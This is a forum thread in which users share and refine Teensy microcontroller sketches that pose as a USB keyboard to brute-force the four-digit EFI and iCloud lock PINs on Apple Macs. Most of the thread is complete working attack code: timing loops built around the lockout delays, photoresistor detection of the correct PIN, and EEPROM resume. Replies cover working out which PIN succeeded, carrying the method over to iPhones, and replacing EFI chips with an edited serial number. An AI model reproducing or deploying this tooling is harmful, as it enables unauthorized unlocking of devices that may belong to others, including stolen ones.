Teensy sketch for EFI and Icloud Bruteforce attack


Rendering Error in layout Widget/Social: Call to a member function exists() on null. Please enable debug mode for more information.
More
8 years 3 months ago - 8 years 2 months ago #2009 by CygnusX1
Here is the sketch for the Teensy if anyone still uses the "bruteforce" method.
This sketch was created by "Orvtech" so all credit go to him.

This is the EFI sketch


#include <usb_keyboard.h>
// This code was developed and written by Overtech
// This code is licensed under Apache 2.0 License
// http://www.apache.org/licenses/LICENSE-2.0.txt
// Limitation of Liability. In no event and under no legal theory,
// whether in tort (including negligence), contract, or otherwise,
// unless required by applicable law (such as deliberate and grossly
// negligent acts) or agreed to in writing, shall any Contributor be
// liable to You for damages, including any direct, indirect, special,
// incidental, or consequential damages of any character arising as a
// result of this License or out of the use or inability to use the
// Work (including but not limited to damages for loss of goodwill,
// work stoppage, computer failure or malfunction, or any and all
// other commercial damages or losses), even if such Contributor
// has been advised of the possibility of such damages.
// This code is indented for people who are not able to contact
// apple support and I am in no way liable for any damage or
// problems this code might cause.

const int ledPin = 13; // choose the pin for the LED
int counter = 0;
int fakecounter = counter;
char pin[]="xxxx";

void setup() {
  pinMode(ledPin, OUTPUT); // declare LED as output
  delay(10000);
}

void loop(){
  keyboard_modifier_keys = 0;
  if (counter <= 9999){
    delay(8000);
    digitalWrite(ledPin, LOW);
    delay(5500);
    digitalWrite(ledPin, HIGH);
    sprintf(pin, "%04d", fakecounter);
    //sending first digit
    Keyboard.press(pin[0]);
    delay(450);
    Keyboard.release(pin[0]);
    delay(420);
    //sending second digit
    Keyboard.press(pin[1]);
    delay(398);
    Keyboard.release(pin[1]);
    delay(510);
    //sending third digit
    Keyboard.press(pin[2]);
    delay(421);
    Keyboard.release(pin[2]);
    delay(423);
    //sending forth digit
    Keyboard.press(pin[3]);
    delay(430);
    Keyboard.release(pin[3]);
    delay(525);
    //sending enter
    Keyboard.press(KEY_ENTER);
    delay(305);
    Keyboard.release(KEY_ENTER);
  }
  //reached 4 digit PIN max value
  if (counter > 9999){
    for (int blinkies = 0; blinkies < 8; blinkies++) {
      digitalWrite(ledPin, HIGH);
      delay(20);
      digitalWrite(ledPin, LOW);
     delay(200);
    }
    delay(6000);
  }
  ++counter;
  fakecounter = counter;
}

This is the Icloud sketch


#include <usb_keyboard.h>
// This code was developed and written by Overtech
// This code is licensed under Apache 2.0 License
// http://www.apache.org/licenses/LICENSE-2.0.txt
// Limitation of Liability. In no event and under no legal theory,
// whether in tort (including negligence), contract, or otherwise,
// unless required by applicable law (such as deliberate and grossly
// negligent acts) or agreed to in writing, shall any Contributor be
// liable to You for damages, including any direct, indirect, special,
// incidental, or consequential damages of any character arising as a
// result of this License or out of the use or inability to use the
// Work (including but not limited to damages for loss of goodwill,
// work stoppage, computer failure or malfunction, or any and all
// other commercial damages or losses), even if such Contributor
// has been advised of the possibility of such damages.
// This code is indented for people who are not able to contact
// apple support and I am in no way liable for any damage or
// problems this code might cause.

const int ledPin = 13;
int counter = 0;

//waits for iCould
int firstloop = 0;
int secondloop = 0;
int thirdloop = 0;
boolean firstcompleted = false;
boolean secondcompleted = false;
int fakecounter = counter;
char pin[]="xxxx";

void setup() {
  pinMode(ledPin, OUTPUT);
  delay(10000);
  digitalWrite(ledPin, LOW);
}

void loop(){
  keyboard_modifier_keys = 0;
  //lets wait 1minute and 1 second
  if (firstloop >= 5){
    delay(61000);
    firstcompleted = true;
    digitalWrite(ledPin, LOW);
  }
  else if ((firstloop < 5) && (firstcompleted == false)){
    digitalWrite(ledPin, HIGH);
    ++firstloop;
    digitalWrite(ledPin, LOW);
  }
  //lets wait 5 minutes and one second
  if ((secondloop >= 1) && (secondcompleted == false) && (firstcompleted == true)){
    delay(301000);
    secondloop = 0;
    secondcompleted = true;
    digitalWrite(ledPin, LOW);
  }
  else if ((secondloop < 1) && (secondcompleted == false) && (firstcompleted == true)){
    ++secondloop;
    digitalWrite(ledPin, LOW);
  }
  //lets wait 15 minutes and 1 second
  if ((thirdloop >= 1) && (secondcompleted == true)){
    delay(901000);
    thirdloop = 0;
    secondcompleted = false;
    firstcompleted = false;
    firstloop = 0;
    secondloop = 0;
    thirdloop = 0;
    digitalWrite(ledPin, LOW);
  }
  else if ((thirdloop < 1) && (secondcompleted == true)){
    ++thirdloop;
    digitalWrite(ledPin, LOW);
  }
  //lets get to work
  if (counter <= 9999){
    delay(100503);
    digitalWrite(ledPin, LOW);
    delay(7049);
    digitalWrite(ledPin, HIGH);
    sprintf(pin, "%04d", fakecounter);
    Keyboard.press(pin[0]);
    delay(450);
    Keyboard.release(pin[0]);
    delay(420);
    Keyboard.press(pin[1]);
    delay(398);
    Keyboard.release(pin[1]);
    delay(510);
    Keyboard.press(pin[2]);
    delay(421);
    Keyboard.release(pin[2]);
    delay(423);
    Keyboard.press(pin[3]);
    delay(430);
    Keyboard.release(pin[3]);
    delay(525);
    Keyboard.press(KEY_ENTER);
    delay(405);
    Keyboard.release(KEY_ENTER);
    digitalWrite(ledPin, LOW);
  }
  //reached 4 digit PIN max value
  if (counter > 9999){
    for (int blinkies = 0; blinkies < 8; blinkies++) {
      digitalWrite(ledPin, HIGH);
      delay(20);
      digitalWrite(ledPin, LOW);
      delay(200);
    }
    delay(6000);
  }
  ++counter;
  fakecounter = counter;
}

You will will need the Teensy loader and the Arduino libraries to load this sketch.

Here is a link to "Github" so any updates will be found here. Also, there is a sketch for just the Icloud 4 digit pin only input.
github.com/orvtech/efi-bruteforce

This may be old school but I still find myself needing it every once and awhile.

If I helped you buy me a latte!
Last edit: 8 years 2 months ago by CygnusX1.

Please Log in or Create an account to join the conversation.

More
8 years 2 months ago #2093 by thaGH05T
OK, I have just started on the Teensy brute force method again. I just feel like being able to brute force EFI or iCloud lock's and not knowing what the pass code is unless you video tape the process or run a script that can guess about when it was cracked yadda yadda yadda is sufficient.

Don't get me wrong, OrvTech is a great guy and was a huge motivator in my research back when I met him on HackMac.com. BUT, I think we are at a point where we can expand on this and actually get the code when the EFI lock is bypassed. I have a few ideas on how this can be done so far and am looking for people here to step up and help me get this readily available for anyone searching for this. I mean I have seen a few existing tools out there that are close to $200, but who the hell wants to pay that?? I could send my mac to an overpriced tech and have him solder a whole new EFI chip for that price. So, here are a couple of my ideas:
  1. Use the Teensy with added logic to tell when the EFI pass-code has been bypassed.
  2. Use the RasPi do do the exact same thing in any language you want with added functionality.
  3. You guys can get of your @$$ and find another viable solution!

I have already started looking into the Teensy method and have challenged #fadguru to a race in finding a solution with the RasPi. I have an idea on how to detect the correct code being entered and my next post wil start to expand on what I have so far. So ALL OF YOU READING THIS, pitch in and show me what you have to offer to this project!
The following user(s) said Thank You: stankovich

Please Log in or Create an account to join the conversation.

More
8 years 2 months ago - 8 years 1 month ago #2094 by thaGH05T
OK, my test machine is an A1278 that i have set the EFI lock manually on. the EFI pass-code is set to 0005 and I have booted into recovery mode to do a manual/dry run. I have found that by pressing caps lock on the Mac's native keyboard and then entering a few wrong pass-codes and then entering the correct one (0005), the mac starts to boot into recovery mode and then unsets the caps lock key. Interesting.... This happens within 5 second of entering the correct pass-code in my case. The time between each permutation is roughly 13 seconds and has to be, because the delay the mac starts to put in between attempts on the EFI pass-code. That being said, there is enough time to catch that event and display the correct pass-code on an small LCD screen and cease execution or just blink the LED happily until you return to see you have an unlocked mac in recovery mode.

Now onto my issue; on a Windows machine I am able to set and unset the caps lock on all attached keyboards from the Teensy. I can also do the same with any of the attached keyboards by pressing caps lock. I have the code setup to turn the LED on when the caps lock is turned on. I upload the sketch to my Teensy and am surprised to see on Apple hardware this will not work the same way. The keyboards seem to work independently and nothing notifies other attached devices when the caps lock status changes. I still haven't lost hope yet with this so I am searching for a solution.

My question; is there a way to listen for this particular event on a mac using Arduino libraries? Or, is there a way I can listen for any hardware events with the Teensy period. Another approach would be to detect when the mac searches for attached hardware, such as when you boot to media select mode holding the option key at boot?

Any ideas from my loyal community??? :)
Last edit: 8 years 1 month ago by thaGH05T.
The following user(s) said Thank You: RAILEANU

Please Log in or Create an account to join the conversation.

More
8 years 1 month ago - 8 years 1 month ago #2479 by thaGH05T
OK, I have decided there is no easy way to do this using the Teensy without the need of at least a voltage divider. the whole idea I had in the beginning was that I wanted to use only a Teensy connected to the mac via USB. If I continue to pursue a method that will catch the USB event or even detecting voltage changes as the Mac looks for drives I am still going to need hardware. The logic will likely have to change for every Mac too, so I decided to go with two simple components for now:

1 - LDR (Light Detecting Resistor/Photoresistor)
2 - 220 Ohm Resistor

By using these two elements we can detect when the passcode is put in correctly by monitoring the LDR from an analog pin on the Teensy. Basically when you boot the Mac holding command it will allow you to select which media to boot from. We place the photoresistor over the padlock, plug in the Teensy, and let it run. The lock is pretty dark and the photoresistor will read pretty low until you get the right code and the screen changes to the media select in which case the photoresistor will read much higher. When we detect the change we want to do something with it such as sound a buzzer and display it on a 4 digit 7 segment display.

The code below simply blinks the USB when complete the key is found as well as when it has tried all combinations. it defines a few variables at the top that can be changed easily to alter delay times and thresholds. This is a very basic brute force code taht will work as is just like Orvtech's code without the need of the resistor or LDR, although it is meant to be a stepping stone to a tool I intend to develop around the Teensy that will allow you to set the values from a display, and display the pin if/when found.

/*******************************************************************************************\
| TITLE: Mac Attack                   DATE: 1/27/2016                                       |
| AUTHOUR: John Neal                  ALIAS: thaGH05T                                       |
| ----------------------------------------------------------------------------------------- |
| LICENCE: This work is licensed under the Creative                                         |
| Commons Attribution-ShareAlike 4.0 International License. To view a copy of this license, |
| visit http://creativecommons.org/licenses/by-sa/4.0/.                                     |
| ----------------------------------------------------------------------------------------- |
| DESCRIPTION: This sketch will methodically brute force the EFI passcode of a Mac if it    |
| has been locked down by iCloud and the EFI passcode has not been previousely set.         |
| Additioonally it is able to detect when the correct code has been entered by using an LDR.|
| ----------------------------------------------------------------------------------------- |
| TO-DO: Add logic for a display and functionallity that lets the user determine the        |
| iteration delay, light threshld, brute force digits, and keypress delay. I will likely    |
| add quick attacks such as common passcodes that will include 1950 and ^.                  |
\*******************************************************************************************/

#include <usb_keyboard.h>

const int readPin = A0;         // Analog read pin of the LDR.
const int ledPin = 13;          // Led Pin, 13 on Teensy 3.1.
const char* digits = "%04d";    // sprintf() format, %04d = 4 digits.
int bfDigits = 9999;            // Brute force eventuallity, how hight to count.
int iterDelay = 14000;          // Iteration delay, adjust as needed.
int lightThresh = 100;          // Threshold of LDR, depends on resistor value.
int count = 0;
char code[4];

void setup() {
  keyboard_modifier_keys = 0;
  pinMode(ledPin, OUTPUT);
  delay(5000);
}

void loop(){
  int lightVal = analogRead(readPin);
  //Serial.println(lightVal);           // Print LDR value to serial to manually determine lightThresh.
  if (lightVal < lightThresh){
    if (count <= bfDigits){
      sprintf(code, digits, count);
      for (int i=0; i < 4; i++){
        digitalWrite(ledPin, HIGH);
        Keyboard.press(code[i]);
        delay(200);
        digitalWrite(ledPin, LOW);
        Keyboard.release(code[i]);
        delay(200);
      }
      Keyboard.press(KEY_ENTER);
      delay(200);
      Keyboard.release(KEY_ENTER);
      delay(iterDelay);
      count++;
    }
    else if (count > bfDigits){
      while (1){
        for (int i=0; i < 3; i++){
          digitalWrite(ledPin, HIGH);
          delay(100);
          digitalWrite(ledPin, LOW);
          delay(100);
        }
        delay(500);
      }
    }
  }
  else if (lightVal > lightThresh){
    while (1){
      for (int i=0; i < 3; i++){
        digitalWrite(ledPin, HIGH);
        delay(100);
        digitalWrite(ledPin, LOW);
        delay(100);
      }
      delay(500);
    }
  }
}

I need some feedback now from you all; what kind of features would you want said tool to have at what price range? Because i will likely just make this into a shield for the Teensy 3.x and Teensy LC. Here are some of my ideas:
  • Buzzer
  • LCD
  • 4 digit 7 segment display
  • LCD w/touch
If this really takes off i may make different levels of shields that could range between blinking an LED in binary to sending a text/email to you upon success/failure. The ball is in your court......
Last edit: 8 years 1 month ago by thaGH05T.
The following user(s) said Thank You: RAILEANU

Please Log in or Create an account to join the conversation.

More
8 years 2 weeks ago #2770 by thaGH05T
Well, nobody has given me any feedback which I find pretty strange since I made huge improvements on the code. Even though nobody is following this yet I have updated the code to do the following:
  • Use 4 digit 7 segment display to show entered key and display saved/found key.
  • Save last entered key into EEPROM in case of power failure and to preserve found key.
  • Improved variable declarations for ease of use and customization.
  • Improved LDR logic for detecting when the correct code is entered.

I will be taking a video for demonstration and instructional use soon...
/*******************************************************************************************\
| TITLE: Mac Attack                   DATE: 1/27/2016                   MODIFIED: 3/13/2016 |
| AUTHOUR: John Neal                  ALIAS: thaGH05T                                       |
| ----------------------------------------------------------------------------------------- |
| LICENCE: This work is licensed under the Creative                                         |
| Commons Attribution-ShareAlike 4.0 International License. To view a copy of this license, |
| visit http://creativecommons.org/licenses/by-sa/4.0/.                                     |
| ----------------------------------------------------------------------------------------- |
| DESCRIPTION: This sketch will methodically brute force the EFI passcode of a Mac if it    |
| has been locked down by iCloud and the EFI passcode has not been previousely set.         |
| Additioonally it is able to detect when the correct code has been entered by using an LDR.|
| ----------------------------------------------------------------------------------------- |
| TO-DO: Add common 4 digit codes as well as birthdate ranges. Add buttons for quick        |
| variable setting. Port over to LCD for usability and versatility of configuration and     |
| attack methods.                                                                           |
\*******************************************************************************************/

/*******************************************************************************************\
| WARNING: This sketch potentially writes 10,000 times to a single address of memory.       |
| Each address can become unreadable after 100,000 writes, so it is recommended that you    |
| change saveAddress before each use.                                                       |
\*******************************************************************************************/

#include <usb_keyboard.h>
#include <SevSeg.h>
#include <EEPROM.h>

const int readPin = A0;                         // Analog read pin of the LDR.
const int ledPin = 13;                          // Led Pin, 13 on Teensy 3.1.
const char* digits = "%04d";                    // sprintf() format, %04d = 4 digits.
int bfDigits = 9999;                            // Brute force eventuallity, how hight to count.
int iterDelay = 14000;                          // Iteration delay, adjust as needed.
int lightThresh = 100;                          // Threshold of LDR, depends on resistor value.
int saveAddress = 1337;                         // Addrress where the last entered digit is stored.
byte numDigits = 4;                             // Number of digits your 7 segment display has.
byte digitPins[] = {9, 10, 11, 12};             // Digit pins, has to be in order from first to last digit.
byte segmentPins[] = {1, 2, 3, 4, 5, 6, 7, 8};  // Segment pins, has to be in order from A to G. Last array object should be the "." dot.
char code[4];                                   // Define the how many digits are in the code array. (change this to the count of bfGigits)
int setupDelay = 5000;                          // This is the time in millisecons that the EFI code or last number entered will be displayed as well as how -->
                                                // long the initial countdown to start brute forcing will be.
SevSeg sevseg;                                  //Instantiate a seven segment object.

void setup() {
  sevseg.begin(COMMON_ANODE, numDigits, digitPins, segmentPins);
  sevseg.setBrightness(10);
  keyboard_modifier_keys = 0;
  pinMode(ledPin, OUTPUT);
  //Serial.begin(9600);           // Begin serial if calibrating lightThresh.

  int efiStartTime = millis();
  int efiEndTime = efiStartTime;
  int savedEFI = readWord(saveAddress);
  while ((efiEndTime - efiStartTime) <= setupDelay){
    sevseg.setNumber(savedEFI,5);
    sevseg.refreshDisplay();
    efiEndTime = millis();
  }
}

int bfCount = 0;  //readWord(saveAddress);          // Determines where to start the brute force count. "0" To begin BF, "readWord(saveAddress)" to start from power failure.
int doOnce = 1;

void loop(){
  if (doOnce == 1){
    int startTime = millis();
    int endTime = startTime;
    while ((endTime - startTime) <= setupDelay + 10){
      int delayMath = endTime / 1000 - 10;
      int modDelay = delayMath * -1;
      sevseg.setNumber(modDelay,5);
      sevseg.refreshDisplay();
      endTime = millis();
    }
    doOnce = 0;
  }
  
  int lightVal = analogRead(readPin);
  //Serial.println(lightVal);           // Print LDR value to serial to manually determine lightThresh.
  if (lightVal < lightThresh){
    if (bfCount <= bfDigits){
      sprintf(code, digits, bfCount);
      for (int i=0; i < 4; i++){
        digitalWrite(ledPin, HIGH);
        Keyboard.press(code[i]);
        delay(200);
        digitalWrite(ledPin, LOW);
        Keyboard.release(code[i]);
        delay(200);
      }
      Keyboard.press(KEY_ENTER);
      delay(200);
      Keyboard.release(KEY_ENTER);
      
      int startTime = millis();
      int endTime = startTime;
      while ((endTime - startTime) <= iterDelay){
        sevseg.setNumber(bfCount,5);
        sevseg.refreshDisplay();
        endTime = millis();
      }
      bfCount++;
      writeWord(saveAddress, bfCount);
    }
    else if (bfCount > bfDigits){
      while (1){
        for (int i=0; i < 3; i++){
          digitalWrite(ledPin, HIGH);
          delay(100);
          digitalWrite(ledPin, LOW);
          delay(100);
        }
        delay(500);
      }
    }
  }
  else if (lightVal > lightThresh){
    writeWord(saveAddress, bfCount);
    while (1){
      sevseg.setNumber(bfCount,5);
      sevseg.refreshDisplay();
    }
  }
}

void writeWord(unsigned address, unsigned value){
  EEPROM.write(address, highByte(value));
  EEPROM.write(address+1, lowByte(value));
}

unsigned readWord(unsigned address){
  return word(EEPROM.read(address), EEPROM.read(address+1));
}

For those of you who are thinking this is too good to be true, your'e welcome. For those of you who have no idea what to do with this, don't worry the tutorial is coming soon and I will be creating a shield for the Teensy xx :)
The following user(s) said Thank You: CygnusX1

Please Log in or Create an account to join the conversation.

More
7 years 11 months ago #2905 by CygnusX1
Can you recommend a good display to use with the Tennsy?

If I helped you buy me a latte!

Please Log in or Create an account to join the conversation.

More
7 years 11 months ago #2912 by thaGH05T
Actually the display is universal, I am using one that I cannot even find a datasheet on but probed the pin-out with a multi-meter. You can literally chose any El cheapo you want as long as you can get the datasheet for reference. This really eats up the pins on your Teensy, making it harder to implement more things into the project, but it does the job. The Teensy has so many pins available anyways. I did it this way to be cheap, but I will likely use a display with a driver that uses only a few pins in the future. The problem here is that the brute force method is outdated and lengthy. So I don't think anyone really needs to use this on a mac anymore. The real opportunity is with brute forcing the iPhone or other devices.
The following user(s) said Thank You: RAILEANU, komaxa

Please Log in or Create an account to join the conversation.

More
7 years 10 months ago - 7 years 10 months ago #3220 by bestfood
Hi can you please advice me how to connect to EEEPROM and how could i apply this code to your code.
Right now im using Teensy 3.2 with 16x2 LCD (HD44780)
#include <usb_keyboard.h>
#include <LiquidCrystal.h>
LiquidCrystal lcd(23,22,16,15,14,13);

const int ledPin = 13; // choose the pin for the LED
int counter = 0;  //Start eingabe
int fakecounter = counter;
char pin[]="xxxx";

void setup() {

  lcd.begin(16, 2);
  lcd.print("CODE INPUT");
  pinMode(ledPin, OUTPUT); // declare LED as output
  delay(9000);
}

void loop(){
  keyboard_modifier_keys = 0;
  if (counter <= 9999){
    delay(7300);
    digitalWrite(ledPin, LOW);
    delay(5500);
    digitalWrite(ledPin, HIGH);
    sprintf(pin, "%04d", fakecounter);
    //sending first digit
    Keyboard.press(pin[0]);
    delay(300);
    Keyboard.release(pin[0]);
    delay(300);
    //sending second digit
    Keyboard.press(pin[1]);
    delay(300);
    Keyboard.release(pin[1]);
    delay(300);
    //sending third digit
    Keyboard.press(pin[2]);
    delay(300);
    Keyboard.release(pin[2]);
    delay(300);
    //sending forth digit
    Keyboard.press(pin[3]);
    delay(300);
    Keyboard.release(pin[3]);
    delay(300);
    //sending enter
    Keyboard.press(KEY_ENTER);
    delay(300);
    Keyboard.release(KEY_ENTER);
    lcd.setCursor(0, 1);
    lcd.print(pin[0]);
    lcd.setCursor(1, 1);
    lcd.print(pin[1]);
    lcd.setCursor(2, 1);
    lcd.print(pin[2]);
    lcd.setCursor(3, 1);
    lcd.print(pin[3]);
      
  }
  
  //reached 4 digit PIN max value
  if (counter > 9999){
    for (int blinkies = 0; blinkies < 8; blinkies++) {
      digitalWrite(ledPin, HIGH);
      delay(20);
      digitalWrite(ledPin, LOW);
     delay(200);
    }
    delay(5300);
  }
  ++counter;
  fakecounter = counter;
}


with this diagram below
Attachments:
Last edit: 7 years 10 months ago by thaGH05T.
The following user(s) said Thank You: RAILEANU

Please Log in or Create an account to join the conversation.

More
7 years 10 months ago #3223 by thaGH05T
Are you wanting to use the LCD in place of the 4 digit 7 segment display? And are you talking about the EEPROM where the count will be saved?

Please Log in or Create an account to join the conversation.

More
7 years 10 months ago #3236 by bestfood
Sorry for late reply, i meant is it possible to show number from EEPROM on screen so that i can start from that specific number.

Thanks

Please Log in or Create an account to join the conversation.

More
7 years 10 months ago #3237 by thaGH05T
Yea man, you can absolutely do anything with this code as far as a controlled brute force attack.

Please Log in or Create an account to join the conversation.

More
7 years 10 months ago #3268 by anthonybrown123
hI there
i bought a teensy 3.2 and its working fine. I put it on for record. I re winded the footage and it unlocked at 10.18.50 sec later. it dose 3 codes every 60secs

But the only thing is i cannot work out the maths to work out the code
1 Hour 3x60= 180

10 Hours = 1800
18 mins = 36
50 Seconds nearly 3/4 codes
Total 1837

I've tried all codes from 1800 to 1900 no luck. what am i doing wrong ??? or am i calculating this up wrong
someone please please help me :(

Please Log in or Create an account to join the conversation.

More
7 years 9 months ago #3271 by CygnusX1
I do 3.45 per min. So I get 207 per hour. So if you are running the same code I am, the pin should be around 2132.
10x60+18x3.45

If I helped you buy me a latte!
The following user(s) said Thank You: anthonybrown123

Please Log in or Create an account to join the conversation.

More
7 years 9 months ago #3282 by reverendalc
i am very interested in this! i've done a LOT of brute forcing in my day, and i've found a few techniques that aid in the process, but due to how easy EFI flashing got, this process was never really developed.

would you consider sharing specifics (like part numbers and vendors) for those of us who are interested, but lack the technical background?

thanks!

Please Log in or Create an account to join the conversation.

More
7 years 9 months ago #3283 by muhdhafiz
Hi Guys,

I have tried this Bruteforce attack on my MBP for 2-3 round which takes about a months but still unable to get through the 4digit code to enter recover mode.

My question is, EFI lock for MBP late 2013 Model A1502 ONLY contains 4digit or it can be anything alphabet + numeric + symbol?

Thank You. :)

Please Log in or Create an account to join the conversation.

More
7 years 9 months ago #3284 by CygnusX1

muhdhafiz wrote: Hi Guys,

I have tried this Bruteforce attack on my MBP for 2-3 round which takes about a months but still unable to get through the 4digit code to enter recover mode.

My question is, EFI lock for MBP late 2013 Model A1502 ONLY contains 4digit or it can be anything alphabet + numeric + symbol?

Thank You. :)


The EFI could be ANYTHING! I could be 12 characters. 4 digit pin number would be if it is ICloud locked.

If I helped you buy me a latte!
The following user(s) said Thank You: muhdhafiz

Please Log in or Create an account to join the conversation.

More
7 years 9 months ago #3286 by muhdhafiz
Thanks for your reply.

My next question is, If I buy this A1502 EMC2678 chip from ebay which is the same model as mine( www.ebay.com/itm/BIOS-EFI-Firmware-Chip-for-Apple-MacBook-Pro-13-A1502-Late-2013-EMC-2678-/141446028030 ) and straight away take out the old emc chip and replace with the new one. Will it work? or I still need to do some tweak in the bin file.

Thank You. :)

Please Log in or Create an account to join the conversation.

More
7 years 9 months ago #3288 by CygnusX1

muhdhafiz wrote: Thanks for your reply.

My next question is, If I buy this A1502 EMC2678 chip from ebay which is the same model as mine( www.ebay.com/itm/BIOS-EFI-Firmware-Chip-for-Apple-MacBook-Pro-13-A1502-Late-2013-EMC-2678-/141446028030 ) and straight away take out the old emc chip and replace with the new one. Will it work? or I still need to do some tweak in the bin file.

Thank You. :)


You would need to edit the bin file to reflect your serial number. Then there is the risk of damage to the new chip or the surrounding components. I would HIGHLY recommend letting it just be serviced properly. Money back gaurntee too! ghostlyhaks.com/shop/efi-lock-removal-service

If I helped you buy me a latte!

Please Log in or Create an account to join the conversation.

More
7 years 9 months ago #3307 by thaGH05T
Ok, for anyone reading this.... The EFI passcode can only be brute forced IF:

The passcode was set by iCloud AND was not previously set.
OR it was set by the user as a 4 to 6 digit numerical value (not likely).

I mean, the brute force method theoretically could work in other ways, but not efficiently lets just say that... For instance.. If they had set a 12 digit number only you could modify my above code and it would go through all the eventualities, but it would take forever.
The following user(s) said Thank You: muhdhafiz

Please Log in or Create an account to join the conversation.

More
7 years 9 months ago #3322 by reverendalc
true that. if you run the brute force tool ONCE, and you don't get through... it's time to invest your energy in another method.

Please Log in or Create an account to join the conversation.

Who's Online

We have 1051 guests and no members online

N00BZ

  • ljamal
  • ljamal74
  • mikeg2atest
  • ducchinhbui
  • anjarezt

Cookies